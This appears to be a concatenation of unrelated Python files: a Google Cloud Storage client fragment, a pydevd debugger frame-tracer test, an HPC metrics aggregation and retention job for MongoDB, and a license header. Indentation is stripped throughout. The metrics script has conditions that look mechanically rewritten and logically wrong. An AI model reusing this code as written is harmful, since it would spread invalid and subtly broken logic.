for pair in pairs_in_batch:
batch_request.Add(self.client.objects, 'Rewrite', pair_to_request[pair])
api_calls = batch_request.Execute(self.client._http) # pylint: disable=protected-access
for pair, api_call in zip(pairs_in_batch, api_calls):
src, dest = pair
response = api_call.response
if self._rewrite_cb is not None:
self._rewrite_cb(response)
if api_call.is_error:
exception = api_call.exception
# Translate 404 to the appropriate not found exception.
if isinstance(exception, HttpError) and exception.status_code == 404:
exception = (
GcsIOError(errno.ENOENT, 'Source file not found: %s' % src))
pair_to_status[pair] = exception
elif not response.done:
_LOGGER.debug(
'Rewrite progress: %d of %d bytes, %s to %s',
response.totalBytesRewritten, response.objectSize, src, dest)
pair_to_request[pair].rewriteToken = response.rewriteToken
else:
_LOGGER.debug('Rewrite done: %s to %s', src, dest)
pair_to_status[pair] = None
return [(pair[0], pair[1], pair_to_status[pair]) for pair in src_dest_pairs]
# We intentionally do not decorate this method with a retry, since the
# underlying copy and delete operations are already idempotent operations
# protected by retry decorators.
def copytree(self, src, dest):
"""Renames the given GCS "directory" recursively from src to dest.
Args:
src: GCS file path pattern in the form gs://<bucket>/<name>/.
dest: GCS file path pattern in the form gs://<bucket>/<name>/.
"""
assert src.endswith('/')
assert dest.endswith('/')
for entry in self.list_prefix(src):
rel_path = entry[len(src):]
self.copy(entry, dest + rel_path)
# We intentionally do not decorate this method with a retry, since the
# underlying copy and delete operations are already idempotent operations
# protected by retry decorators.
def rename(self, src, dest):
"""Renames the given GCS object from src to dest.
Args:
src: GCS file path pattern in the form gs://<bucket>/<name>.
dest: GCS file path pattern in the form gs://<bucket>/<name>.
"""
self.copy(src, dest)
self.delete(src)
@retry.with_exponential_backoff(
retry_filter=retry.retry_on_server_errors_and_timeout_filter)
def exists(self, path):
"""Returns whether the given GCS object exists.
Args:
path: GCS file path pattern in the form gs://<bucket>/<name>.
"""
bucket, object_path = parse_gcs_path(path)
try:
request = storage.StorageObjectsGetRequest(
bucket=bucket, object=object_path)
self.client.objects.Get(request) # metadata
return True
except HttpError as http_error:
if http_error.status_code == 404:
# HTTP 404 indicates that the file did not exist
return False
else:
# We re-raise all other exceptions
raise
@retry.with_exponential_backoff(
retry_filter=retry.retry_on_server_errors_and_timeout_filter)
def checksum(self, path):
"""Looks up the checksum of a GCS object.
Args:
path: GCS file path pattern in the form gs://<bucket>/<name>.
"""
bucket, object_path = parse_gcs_path(path)
request = storage.StorageObjectsGetRequest(
bucket=bucket, object=object_path)
return self.client.objects.Get(request).crc32c
@retry.with_exponential_backoff(
retry_filter=retry.retry_on_server_errors_and_timeout_filter)
def size(self, path):
"""Returns the size of a single GCS object.
This method does not perform glob expansion. Hence the given path must be
for a single GCS object.
Returns: size of the GCS object in bytes.
"""
bucket, object_path = parse_gcs_path(path)
request = storage.StorageObjectsGetRequest(
bucket=bucket, object=object_path)
return self.client.objects.Get(request).size
@retry.with_exponential_backoff(
retry_filter=retry.retry_on_server_errors_and_timeout_filter)
def kms_key(self, path):
"""Returns the KMS key of a single GCS object.
This method does not perform glob expansion. Hence the given path must be
for a single GCS object.
Returns: KMS key name of the GCS object as a string, or None if it doesn't
have one.
"""
bucket, object_path = parse_gcs_path(path)
request = storage.StorageObjectsGetRequest(
bucket=bucket, object=object_path)
return self.client.objects.Get(request).kmsKeyName
@retry.with_exponential_backoff(
retry_filter=retry.retry_on_server_errors_and_timeout_filter)
def last_updated(self, path):
"""Returns the last updated epoch time of a single GCS object.
This method does not perform glob expansion. Hence the given path must be
for a single GCS object.
Returns: last updated time of the GCS object in second.
"""
bucket, object_path = parse_gcs_path(path)
request = storage.StorageObjectsGetRequest(
bucket=bucket, object=object_path)
datetime = self.client.objects.Get(request).updated
return (time.mktime(datetime.timetuple()) - time.timezone
+ datetime.microsecond / 1000000.0)
@retry.with_exponential_backoff(
retry_filter=retry.retry_on_server_errors_and_timeout_filter)
def list_prefix(self, path):
"""Lists files matching the prefix.
Args:
path: GCS file path pattern in the form gs://<bucket>/[name].
Returns:
Dictionary of file name -> size.
"""
bucket, prefix = parse_gcs_path(path, object_optional=True)
request = storage.StorageObjectsListRequest(bucket=bucket, prefix=prefix)
file_sizes = {}
counter = 0
start_time = time.time()
_LOGGER.info("Starting the size estimation of the input")
while True:
response = self.client.objects.List(request)
for item in response.items:
file_name = 'gs://%s/%s' % (item.bucket, item.name)
file_sizes[file_name] = item.size
counter += 1
if counter % 10000 == 0:
_LOGGER.info("Finished computing size of: %s files", len(file_sizes))
if response.nextPageToken:
request.pageToken = response.nextPageToken
else:
break
_LOGGER.info("Finished listing %s files in %s seconds.",
counter, time.time() - start_time)
return file_sizes
class GcsDownloader(Downloader):
def __init__(self, client, path, buffer_size):
self._client = client
self._path = path
self._bucket, self._name = parse_gcs_path(path)
self._buffer_size = buffer_size
# Get object state.
self._get_request = (storage.StorageObjectsGetRequest(
bucket=self._bucket, object=self._name))
try:
metadata = self._get_object_metadata(self._get_request)
except HttpError as http_error:
if http_error.status_code == 404:
raise IOError(errno.ENOENT, 'Not found: %s' % self._path)
else:
_LOGGER.error('HTTP error while requesting file %s: %s', self._path,
http_error)
raise
self._size = metadata.size
# Ensure read is from file of the correct generation.
self._get_request.generation = metadata.generation
# Initialize read buffer state.
self._download_stream = io.BytesIO()
self._downloader = transfer.Download(
self._download_stream, auto_transfer=False, chunksize=self._buffer_size,
num_retries=20)
self._client.objects.Get(self._get_request, download=self._downloader)
@retry.with_exponential_backoff(
retry_filter=retry.retry_on_server_errors_and_timeout_filter)
def _get_object_metadata(self, get_request):
return self._client.objects.Get(get_request)
@property
def size(self):
return self._size
def get_range(self, start, end):
self._download_stream.seek(0)
self._download_stream.truncate(0)
self._downloader.GetRange(start, end - 1)
return self._download_stream.getvalue()
class GcsUploader(Uploader):
def __init__(self, client, path, mime_type):
self._client = client
self._path = path
self._bucket, self._name = parse_gcs_path(path)
self._mime_type = mime_type
# Set up communication with child thread.
parent_conn, child_conn = multiprocessing.Pipe()
self._child_conn = child_conn
self._conn = parent_conn
# Set up uploader.
self._insert_request = (storage.StorageObjectsInsertRequest(
bucket=self._bucket, name=self._name))
self._upload = transfer.Upload(
PipeStream(self._child_conn),
self._mime_type,
chunksize=WRITE_CHUNK_SIZE)
self._upload.strategy = transfer.RESUMABLE_UPLOAD
# Start uploading thread.
self._upload_thread = threading.Thread(target=self._start_upload)
self._upload_thread.daemon = True
self._upload_thread.last_error = None
self._upload_thread.start()
# TODO(silviuc): Refactor so that retry logic can be applied.
# There is retry logic in the underlying transfer library but we should make
# it more explicit so we can control the retry parameters.
@retry.no_retries # Using no_retries marks this as an integration point.
def _start_upload(self):
# This starts the uploader thread. We are forced to run the uploader in
# another thread because the apitools uploader insists on taking a stream
# as input. Happily, this also means we get asynchronous I/O to GCS.
#
# The uploader by default transfers data in chunks of 1024 * 1024 bytes at
# a time, buffering writes until that size is reached.
try:
self._client.objects.Insert(self._insert_request, upload=self._upload)
except Exception as e: # pylint: disable=broad-except
_LOGGER.error('Error in _start_upload while inserting file %s: %s',
self._path, traceback.format_exc())
self._upload_thread.last_error = e
finally:
self._child_conn.close()
def put(self, data):
try:
self._conn.send_bytes(data.tobytes())
except EOFError:
if self._upload_thread.last_error is not None:
raise self._upload_thread.last_error # pylint: disable=raising-bad-type
raise
def finish(self):
self._conn.close()
# TODO(udim): Add timeout=DEFAULT_HTTP_TIMEOUT_SECONDS * 2 and raise if
# isAlive is True.
self._upload_thread.join()
# Check for exception since the last put() call.
if self._upload_thread.last_error is not None:
raise self._upload_thread.last_error # pylint: disable=raising-bad-type
|
_debugger_case_check_tracer.py | import threading, atexit, sys
from collections import namedtuple
import os.path
if sys.version_info[0] >= 3:
from _thread import start_new_thread
else:
from thread import start_new_thread
FrameInfo = namedtuple('FrameInfo', 'filename, name, f_trace')
def _atexit():
sys.stderr.flush()
sys.stdout.flush()
# Register the TEST SUCEEDED msg to the exit of the process.
atexit.register(_atexit)
def _iter_frame_info(frame):
while frame is not None:
yield FrameInfo(
os.path.basename(frame.f_code.co_filename),
frame.f_code.co_name,
frame.f_trace.__name__ if frame.f_trace is not None else "None"
)
frame = frame.f_back
def check_frame_info(expected):
found = list(_iter_frame_info(sys._getframe().f_back))
def fail():
raise AssertionError('Expected:\n%s\n\nFound:\n%s\n' % (
'\n'.join(str(x) for x in expected),
'\n'.join(str(x) for x in found)))
for found_info, expected_info in zip(found, expected):
if found_info.filename != expected_info.filename or found_info.name != expected_info.name:
fail()
for f_trace in expected_info.f_trace.split('|'):
if f_trace == found_info.f_trace:
break
else:
fail()
def thread_func():
if sys.version_info[0] >= 3:
check_frame_info([
FrameInfo(filename='_debugger_case_check_tracer.py', name='thread_func', f_trace='trace_exception'),
FrameInfo(filename='threading.py', name='run', f_trace='None'),
FrameInfo(filename='threading.py', name='_bootstrap_inner', f_trace='trace_unhandled_exceptions'),
FrameInfo(filename='threading.py', name='_bootstrap', f_trace='None'),
FrameInfo(filename='pydev_monkey.py', name='__call__', f_trace='None')
])
else:
check_frame_info([
FrameInfo(filename='_debugger_case_check_tracer.py', name='thread_func', f_trace='trace_exception'),
FrameInfo(filename='threading.py', name='run', f_trace='None'),
FrameInfo(filename='threading.py', name='__bootstrap_inner', f_trace='trace_unhandled_exceptions'),
FrameInfo(filename='threading.py', name='__bootstrap', f_trace='None'),
FrameInfo(filename='pydev_monkey.py', name='__call__', f_trace='None'),
])
th = threading.Thread(target=thread_func)
th.setDaemon(True)
th.start()
event = threading.Event()
def thread_func2():
try:
check_frame_info([
FrameInfo(filename='_debugger_case_check_tracer.py', name='thread_func2', f_trace='trace_exception'),
FrameInfo(filename='pydev_monkey.py', name='__call__', f_trace='trace_unhandled_exceptions')
])
finally:
event.set()
start_new_thread(thread_func2, ())
event.wait()
th.join()
# This is a bit tricky: although we waited on the event, there's a slight chance
# that we didn't get the notification because the thread could've stopped executing,
# so, sleep a bit so that the test does not become flaky.
import time
time.sleep(.3)
if sys.version_info[0] >= 3:
check_frame_info([
FrameInfo(filename='_debugger_case_check_tracer.py', name='<module>', f_trace='trace_exception'),
FrameInfo(filename='_pydev_execfile.py', name='execfile', f_trace='None'),
FrameInfo(filename='pydevd.py', name='_exec', f_trace='trace_unhandled_exceptions'),
FrameInfo(filename='pydevd.py', name='run', f_trace='trace_dispatch|None'),
FrameInfo(filename='pydevd.py', name='main', f_trace='trace_dispatch|None'),
FrameInfo(filename='pydevd.py', name='<module>', f_trace='trace_dispatch|None')
])
else:
check_frame_info([
FrameInfo(filename='_debugger_case_check_tracer.py', name='<module>', f_trace='trace_exception'),
FrameInfo(filename='pydevd.py', name='_exec', f_trace='trace_unhandled_exceptions'),
FrameInfo(filename='pydevd.py', name='run', f_trace='trace_dispatch|None'),
FrameInfo(filename='pydevd.py', name='main', f_trace='trace_dispatch|None'),
FrameInfo(filename='pydevd.py', name='<module>', f_trace='trace_dispatch|None'),
])
print('TEST SUCEEDED')
|
bkg_metrics_job_script.py | import time
import multiprocessing as mp
import pymongo
from datetime import datetime, timedelta
from pymongo import MongoClient
import logging
import sys
logging.basicConfig(stream=sys.stderr, level=logging.DEBUG);
MONGO_DB_URL = 'mongodb://localhost:27017/'
DATABASE_NAME = 'hpc_monitoring'
EPOCH_BEGIN_DATETIME = datetime.fromtimestamp(0)
# get unix milliseconds from python datetime
def unix_time_millis(dt):
return int(float(dt.strftime("%s.%f")) * 1000)
# 1. for metric collection calculate and insert minutely,hourly and daily averages
def processCollection(name, structure):
while True:
childClient = None
try:
childClient = MongoClient(MONGO_DB_URL)
db = childClient[DATABASE_NAME]
mainCollection = db[name]
minutelyCollection = db[name + '.minutely']
hourlyCollection = db[name + '.hourly']
dailyCollection = db[name + '.daily']
# Make sure these indexes exist for faster quering purposes
minutelyCollection.create_index([('NodeId', pymongo.ASCENDING), ('Timestamp', pymongo.ASCENDING)],
background=True,
unique=True)
minutelyCollection.create_index([('Timestamp', pymongo.ASCENDING)])
hourlyCollection.create_index([('NodeId', pymongo.ASCENDING), ('Timestamp', pymongo.ASCENDING)],
background=True,
unique=True)
hourlyCollection.create_index([('Timestamp', pymongo.ASCENDING)])
dailyCollection.create_index([('NodeId', pymongo.ASCENDING), ('Timestamp', pymongo.ASCENDING)],
background=True,
unique=True)
dailyCollection.create_index([('Timestamp', pymongo.ASCENDING)], background=True)
mainCollection.create_index([('Timestamp', pymongo.ASCENDING)], background=True)
''' Check if data exists already'''
minutelyLastTimestamp = 0
hourlyLastTimestamp = 0
dailyLastTimestamp = 0
'''Variable to check whether to Process Daily or hourly records in current loop'''
processMinutely = False
processHourly = False
# The daily and hourly averages should be calculated only at beginning of next day
# or begnning of next hour so define variables which store dayValue and hourValue of
# last minuteTimestamp
minutelyLastTimestampDayValue = 0
minutelyLastTimestampHourValue = 0
for doc in minutelyCollection.find({}, {"Timestamp": 1}).sort('Timestamp', -1).limit(1):
minutelyLastTimestamp = doc['Timestamp']
dateTemp = datetime.fromtimestamp(minutelyLastTimestamp / 1000.0)
minutelyLastTimestampDayValue = datetime(dateTemp.year, dateTemp.month, dateTemp.day)
minutelyLastTimestampHourValue = datetime(dateTemp.year, dateTemp.month, dateTemp.day,
dateTemp.hour)
for doc in hourlyCollection.find({}, {"Timestamp": 1}).sort('Timestamp', -1).limit(1):
hourlyLastTimestamp = doc['Timestamp']
for doc in dailyCollection.find({}, {"Timestamp": 1}).sort('Timestamp', -1).limit(1):
dailyLastTimestamp = doc['Timestamp']
minutelySum = {}
minutelyCount = {}
hourlySum = {}
hourlyCount = {}
dailySum = {}
dailyCount = {}
currentMinute = 0 # 0 means start of new minute
currentHour = 0 # 0 means start of new hour
currentDay = 0 # 0 means start of new day
# filter query
filter = {}
# if minutelyLastTimestamp <> 0 and hourlyLastTimestamp <> 0 and dailyLastTimestamp <> 0:
if minutelyLastTimestamp < 0 or minutelyLastTimestamp > 0 and hourlyLastTimestamp < 0 or hourlyLastTimestamp > 0 and dailyLastTimestamp < 0 or dailyLastTimestamp > 0:
currentDateTimeTemp = datetime.now()
todayDate = datetime(currentDateTimeTemp.year, currentDateTimeTemp.month, currentDateTimeTemp.day)
if todayDate == minutelyLastTimestampDayValue or todayDate == (
minutelyLastTimestampDayValue + timedelta(days=1)):
if minutelyLastTimestampDayValue > datetime.fromtimestamp(
dailyLastTimestamp / 1000.0):
filter = {"Timestamp": {'$gte': dailyLastTimestamp}}
elif minutelyLastTimestampHourValue > datetime.fromtimestamp(
hourlyLastTimestamp / 1000.0):
filter = {"Timestamp": {'$gte': hourlyLastTimestamp}}
processHourly = True
else:
filter = {"Timestamp": {'$gte': minutelyLastTimestamp}}
processMinutely = True
else:
filter = {"Timestamp": {'$gte': dailyLastTimestamp}}
# if record already exists modify filter query to fetch newer records only
for document in mainCollection.find(filter).sort('Timestamp', 1):
runningDate = datetime.fromtimestamp(document['Timestamp'] / 1000.0)
'''Minute Record Processing'''
if document['Timestamp'] > minutelyLastTimestamp:
# process record for minutely average
# initialize all fields count and sum to 0 if not initialised
if document['NodeId'] not in minutelySum:
minutelySum[document['NodeId']] = {}
minutelyCount[document['NodeId']] = 0
for field in structure:
minutelySum[document['NodeId']][field] = 0
runningMinute = datetime(runningDate.year, runningDate.month, runningDate.day,
runningDate.hour,
runningDate.minute)
if currentMinute == 0:
currentMinute = runningMinute
# insert averageData to minutely collection
if runningMinute != currentMinute:
for node in minutelySum:
# if minutelyCount[node] <> 0:
if minutelyCount[node] < 0 or minutelyCount[node] > 0:
minuteDoc = {}
minuteDoc['NodeId'] = node
minuteDoc['Timestamp'] = unix_time_millis(currentMinute)
for field in minutelySum[node]:
if structure[field] == 'double':
minuteDoc[field] = minutelySum[node][field] / minutelyCount[node]
else:
minuteDoc[field] = int(minutelySum[node][field] / minutelyCount[node])
try:
minutelyCollection.insert_one(minuteDoc)
except BaseException as e:
pass
minutelySum = {}
minutelyCount = {}
minutelySum[document['NodeId']] = {}
minutelyCount[document['NodeId']] = 0
for field in structure:
minutelySum[document['NodeId']][field] = 0
currentMinute = runningMinute
# in either case update minutelyCount and minutely sum
minutelyCount[document['NodeId']] += 1
for field in structure:
if field in document:
minutelySum[document['NodeId']][field] += document[field]
'''Hour Record Processing'''
if not (processMinutely) and document['Timestamp'] > hourlyLastTimestamp:
# process record for hourly average
# initialize all fields count and sum to 0 if not initialised
if document['NodeId'] not in hourlySum:
hourlySum[document['NodeId']] = {}
hourlyCount[document['NodeId']] = 0
for field in structure:
hourlySum[document['NodeId']][field] = 0
runningHour = datetime(runningDate.year, runningDate.month, runningDate.day,
runningDate.hour)
if currentHour == 0:
currentHour = runningHour
# insert averageData to hourly collection
if runningHour != currentHour:
for node in hourlySum:
if hourlyCount[node] != 0:
hourDoc = {}
hourDoc['NodeId'] = node
hourDoc['Timestamp'] = unix_time_millis(currentHour)
for field in hourlySum[node]:
if structure[field] == 'double':
hourDoc[field] = hourlySum[node][field] / hourlyCount[node]
else:
floatAvg = hourlySum[node][field] / hourlyCount[node]
hourDoc[field] = int(floatAvg)
try:
hourlyCollection.insert_one(hourDoc)
except:
pass
hourlySum = {}
hourlyCount = {}
hourlySum[document['NodeId']] = {}
hourlyCount[document['NodeId']] = 0
for field in structure:
hourlySum[document['NodeId']][field] = 0
currentHour = runningHour
# in either case update hourlyCount and hourly sum
hourlyCount[document['NodeId']] += 1
for field in structure:
if field in document:
hourlySum[document['NodeId']][field] += document[field]
'''Daily Record Processing'''
# process record for daily average
# initialize all fields count and sum to 0 if not initialised
if not (processMinutely) and not (processHourly):
if document['NodeId'] not in dailySum:
dailySum[document['NodeId']] = {}
dailyCount[document['NodeId']] = 0
for field in structure:
dailySum[document['NodeId']][field] = 0
runningDay = datetime(runningDate.year, runningDate.month, runningDate.day)
if currentDay == 0:
currentDay = runningDay
# insert averageData to daily collection
if runningDay != currentDay:
for node in dailySum:
if dailyCount[node] != 0:
dayDoc = {}
dayDoc['NodeId'] = node
dayDoc['Timestamp'] = unix_time_millis(currentDay)
for field in dailySum[node]:
if structure[field] == 'double':
dayDoc[field] = dailySum[node][field] / dailyCount[node]
else:
dayDoc[field] = int(dailySum[node][field] / dailyCount[node])
try:
dailyCollection.insert_one(dayDoc)
except:
pass
dailySum = {}
dailyCount = {}
dailySum[document['NodeId']] = {}
dailyCount[document['NodeId']] = 0
for field in structure:
dailySum[document['NodeId']][field] = 0
currentDay = runningDay
# in either case update dailyCount and daily sum
dailyCount[document['NodeId']] += 1
for field in structure:
if field in document:
dailySum[document['NodeId']][field] += document[field]
# if counter % 100 != 0:
# bulkUpdateMinutelyCollection.execute()
except BaseException as e:
logging.error(datetime.now().strftime('%Y-%m-%d %H:%M:%S') + " : " + str(e))
finally:
childClient.close()
time.sleep(90)
# 2. Check what metrics exist for all jobs and add a field 'metrices' to the job collection
def jobMetricsChecker():
while True:
client = None
try:
client = MongoClient(MONGO_DB_URL)
db = client[DATABASE_NAME]
metricesNames = []
schemaCollection = db.schema
# get all metrics name from schema
metricSchemas = schemaCollection.find({'type': 'metrics'})
for metric in metricSchemas:
metricesNames.append(metric['name'])
jobCollection = db.job
for document in jobCollection.find(
{'$and': [{"metrices": {'$exists': False}}, {"end_time": {'$exists': True}},
{"end_time": {'$gt': 0}}]}).sort('_id', 1):
existingMetrics = []
# process job if starting is greater than 0
if document['start_time'] > 0:
# for each metric check if metrics data exists for current job
start_time_milli = document['start_time'] * 1000
end_time_milli = document['end_time'] * 1000 if document['end_time'] < 0 or document['end_time'] > 0 else 3165539199849 # millisecods for year 2070
for metric in metricesNames:
if db[metric].find_one({'Timestamp': {'$gte': start_time_milli, '$lte': end_time_milli}}):
existingMetrics.append(metric)
for dyn_metric in db.dynamic_schema.find({"Jobid": document['_id']}, {"name": 1}):
existingMetrics.append(dyn_metric['name'])
# update job by adding/updating metrices field
jobCollection.update_one({'_id': document['_id']}, {'$set': {'metrices': existingMetrics}},
upsert=False)
except BaseException as e:
logging.error(datetime.now().strftime('%Y-%m-%d %H:%M:%S') + " : " + str(e))
finally:
client.close()
time.sleep(90)
# 3. Clear old data
def deleteOldData():
while True:
client = None
try:
client = MongoClient(MONGO_DB_URL)
db = client[DATABASE_NAME]
schemaCollection = db.schema
# get all metrics name from schema
metricSchemas = schemaCollection.find({'type': 'metrics'})
for metric in metricSchemas:
metricMainCollection = db[metric['name']]
metricMinutelyCollection = db[metric['name'] + '.minutely']
metricHourlyCollection = db[metric['name'] + '.hourly']
# Get timestamp for 90 days ago (for main collection)
timeBefore90 = unix_time_millis(datetime.now() - timedelta(days=90))
# delete documents older than 90 days for main collection
metricMainCollection.delete_many({"Timestamp": {'$lte': timeBefore90}})
# Get timestamp for 180 days ago (for minutely collection)
timeBefore180 = unix_time_millis(datetime.now() - timedelta(days=180))
# delete documents older than 180 days for minutely collection
metricMinutelyCollection.delete_many({"Timestamp": {'$lte': timeBefore180}})
# Get timestamp for 365 days ago (for hourly collection)
timeBefore365 = unix_time_millis(datetime.now() - timedelta(days=365))
# delete documents older than 365 days for hourly collection
metricHourlyCollection.delete_many({"Timestamp": {'$lte': timeBefore365}})
except BaseException as e:
logging.error(datetime.now().strftime('%Y-%m-%d %H:%M:%S') + " : " + str(e))
finally:
client.close()
time.sleep(300 * 60) # sleep 5 hour
# 4.1 Create Overview for SPAPI
def processSpapiOverview(schemaName):
while True:
childClient = None
try:
childClient = MongoClient(MONGO_DB_URL)
db = childClient[DATABASE_NAME]
dynamicSchemaCollection = hpcDB.dynamic_schema
db[schemaName].create_index([('Jobid', pymongo.ASCENDING)], background=True)
allJobMetrics = dynamicSchemaCollection.find(
{'$and': [{'name': schemaName}, {'processedOverview': {'$exists': False}}]}).sort(
'_id', 1)
for jobMetric in allJobMetrics:
if 'processedOverview' in jobMetric:
continue
breakLoop = False
for job in db.job.find({'_id': jobMetric['Jobid']}):
# if not ('end_time' in job and job['end_time'] <> 0 and job['end_time'] <> ""):
if not ('end_time' in job and job['end_time'] < 0 or job['end_time'] > 0 and job['end_time'] < "" or job['end_time'] > ""):
breakLoop = True
if breakLoop:
break
metricFields = jobMetric['structure']
for metric in metricFields:
aggregateResult = db[schemaName].aggregate([
{
'$match': {'Jobid': jobMetric['Jobid']}
},
{
'$group': {
'_id': {'Jobid': '$Jobid', 'NodeId': '$NodeId', 'ProcessId': '$ProcessId'},
'avg': {'$avg': '$' + metric},
'min': {'$first': '$' + metric},
'max': {'$last': '$' + metric}
}
},
{
'$project': {
'_id': '$_id',
'' + metric: {'avg': '$avg', 'min': '$min', 'max': '$max'}
}
}
])
for record in aggregateResult:
db[schemaName + '.overview'].update_one({
'_id': record['_id']
}, {
'$set': {
metric + '': record[metric]
}
}, upsert=True)
'''update dynamic_schema'''
try:
dynamicSchemaCollection.update_one({"$and": [{"name": schemaName}, {"Jobid": jobMetric['Jobid']}]},
{'$set': {'processedOverview': True}})
except BaseException as e:
pass
except BaseException as e:
logging.error(datetime.now().strftime('%Y-%m-%d %H:%M:%S') + " : " + str(e))
finally:
childClient.close()
time.sleep(90)
# 4.2 Averages For SPAPI
def processSpapiCollection(schemaName):
while True:
childClient = None
try:
childClient = MongoClient(MONGO_DB_URL)
db = childClient[DATABASE_NAME]
mainCollection = db[schemaName]
minutelyCollection = db[schemaName + '.minutely']
hourlyCollection = db[schemaName + '.hourly']
# Make sure these indexes exist for faster quering purposes
minutelyCollection.create_index(
[('Jobid', pymongo.ASCENDING), ('NodeId', pymongo.ASCENDING), ('ProcessId', pymongo.ASCENDING),
('Timestamp', pymongo.ASCENDING)],
background=True,
unique=True)
minutelyCollection.create_index([('Timestamp', pymongo.ASCENDING)])
hourlyCollection.create_index(
[('Jobid', pymongo.ASCENDING), ('NodeId', pymongo.ASCENDING), ('ProcessId', pymongo.ASCENDING),
('Timestamp', pymongo.ASCENDING)],
background=True,
unique=True)
hourlyCollection.create_index([('Timestamp', pymongo.ASCENDING)])
mainCollection.create_index([('Jobid', pymongo.ASCENDING)], background=True)
mainCollection.create_index([('Timestamp', pymongo.ASCENDING)], background=True)
dynamicSchemaCollection = hpcDB.dynamic_schema
allJobMetrics = dynamicSchemaCollection.find(
{'$and': [{'name': schemaName}, {'processedMax': {'$exists': False}}]}).sort(
'_id', 1)
for jobMetric in allJobMetrics:
if 'processedMax' in jobMetric:
continue
metricFields = jobMetric['structure']
for metric in metricFields:
aggregateResultMinutely = db[schemaName].aggregate([
{
'$match': {'Jobid': jobMetric['Jobid']}
},
{
"$group": {
"_id": {
"year": {"$year": {"$add": [EPOCH_BEGIN_DATETIME, "$Timestamp"]}},
"month": {"$month": {"$add": [EPOCH_BEGIN_DATETIME, "$Timestamp"]}},
"day": {"$dayOfMonth": {"$add": [EPOCH_BEGIN_DATETIME, "$Timestamp"]}},
"hour": {"$hour": {"$add": [EPOCH_BEGIN_DATETIME, "$Timestamp"]}},
"minute": {"$minute": {"$add": [EPOCH_BEGIN_DATETIME, "$Timestamp"]}},
"Jobid": "$Jobid",
"NodeId": "$NodeId",
"ProcessId": "$ProcessId"
},
"Timestamp": {"$last": "$Timestamp"},
"" + metric: {"$last": "$" + metric}
}
},
{
'$project': {
'Timestamp': "$Timestamp",
'' + metric: "$" + metric
}
}
])
bulkopMinutely = db[schemaName + '.minutely'].initialize_ordered_bulk_op()
bulkTracker = 0
for record in aggregateResultMinutely:
bulkopMinutely.find({
'_id': record['_id']
}).upsert().update({
'$set': {
'Timestamp': record['Timestamp'],
'Jobid': record['_id']['Jobid'],
'NodeId': record['_id']['NodeId'],
'ProcessId': record['_id']['ProcessId'],
metric + '': record[metric],
}
})
bulkTracker += 1
if bulkTracker >= 500:
bulkopMinutely.execute()
bulkTracker = 0
bulkopMinutely = db[schemaName + '.minutely'].initialize_ordered_bulk_op()
# check for remaining bulk operations
if bulkTracker > 0:
bulkopMinutely.execute()
for metric in metricFields:
aggregateResultHourly = db[schemaName + '.minutely'].aggregate([
{
'$match': {'Jobid': jobMetric['Jobid']}
},
{
"$group": {
"_id": {
"year": "$_id.year",
"month": "$_id.month",
"day": "$_id.day",
"hour": "$_id.hour",
"Jobid": "$Jobid",
"NodeId": "$NodeId",
"ProcessId": "$ProcessId"
},
"Timestamp": {"$last": "$Timestamp"},
"" + metric: {"$last": "$" + metric}
}
},
{
'$project': {
'Timestamp': "$Timestamp",
'' + metric: "$" + metric
}
}
])
bulkopHourly = db[schemaName + '.hourly'].initialize_ordered_bulk_op()
bulkTracker = 0
for record in aggregateResultHourly:
bulkopHourly.find({
'_id': record['_id']
}).upsert().update({
'$set': {
'Timestamp': record['Timestamp'],
'Jobid': record['_id']['Jobid'],
'NodeId': record['_id']['NodeId'],
'ProcessId': record['_id']['ProcessId'],
metric + '': record[metric]
}
})
bulkTracker += 1
if bulkTracker >= 500:
bulkopHourly.execute()
bulkTracker = 0
bulkopHourly = db[schemaName + '.hourly'].initialize_ordered_bulk_op()
# check for remaining bulk operations
if bulkTracker > 0:
bulkopHourly.execute()
'''update dynamic_schema'''
try:
dynamicSchemaCollection.update_one({"$and": [{"name": schemaName}, {"Jobid": jobMetric['Jobid']}]},
{'$set': {'processedMax': True}})
except BaseException as e:
pass
except BaseException as e:
logging.error(datetime.now().strftime('%Y-%m-%d %H:%M:%S') + " : " + str(e))
finally:
childClient.close()
time.sleep(90)
# for metric collection calculate and insert minutely,hourly and daily averages
if __name__ == '__main__':
# Separately process each metrics using process
metricProcesses = {}
dynamicMetricProcesses = {}
jobProcess = None
clearOldProcess = None
parentClient = None
while True:
parentClient = None
schema = {}
dynamic_schema = []
try:
# connect to mongodb and get metricnames from schema collection
parentClient = MongoClient(MONGO_DB_URL)
hpcDB = parentClient[DATABASE_NAME]
schemaCollection = hpcDB.schema
metricSchemas = schemaCollection.find({'type': 'metrics'})
for metric in metricSchemas:
structure = metric['structure']
for key in metric['non_metric_fields']:
structure.pop(key, None)
schema[metric['name']] = structure
dynamicSchemaCollection = hpcDB.dynamic_schema
dynamicSchemas = dynamicSchemaCollection.distinct("name")
for dynamicSchema in dynamicSchemas:
dynamic_schema.append(dynamicSchema)
# Close mongoclient before forking to subprocess
parentClient.close()
# 1. Create processes for all metrics in schema collection (to calculate periodic averages)
for metric in schema:
# if the process doesnot exist for metrics or it is killed
if metric not in metricProcesses or (not (metricProcesses[metric].is_alive())):
metricProcesses[metric] = mp.Process(target=processCollection, args=(metric, schema[metric]))
metricProcesses[metric].start()
# 2. Create process to check what metrics exist for all jobs
if jobProcess is None or (not (jobProcess.is_alive())):
jobProcess = mp.Process(target=jobMetricsChecker)
jobProcess.start()
# 3. Create process to clear the old data
if clearOldProcess is None or (not (clearOldProcess.is_alive())):
clearOldProcess = mp.Process(target=deleteOldData)
clearOldProcess.start()
# 4. Create processes for metrics in dynamic_schema collection
for schemaName in dynamic_schema:
if schemaName == 'spapi':
if schemaName + ".overview" not in dynamicMetricProcesses or (
not (dynamicMetricProcesses[schemaName + ".overview"].is_alive())):
dynamicMetricProcesses[schemaName + ".overview"] = mp.Process(target=processSpapiOverview,
args=(schemaName,))
dynamicMetricProcesses[schemaName + ".overview"].start()
if schemaName not in dynamicMetricProcesses or (
not (dynamicMetricProcesses[schemaName].is_alive())):
dynamicMetricProcesses[schemaName] = mp.Process(target=processSpapiCollection,
args=(schemaName,))
dynamicMetricProcesses[schemaName].start()
except BaseException as e:
logging.error(datetime.now().strftime('%Y-%m-%d %H:%M:%S') + " : " + str(e))
finally:
time.sleep(60 * 10) # sleep 10 minutes
|
host.py | # Copyright 2010 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# All Rights Reserved.
# Copyright (c) 2010 Citrix Systems, Inc.
# Copyright (c) 2011 Piston Cloud Computing, Inc
# Copyright (c) 2012 University Of Minho
# (c) Copyright 2013 Hewlett-Packard Development Company, L.P.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
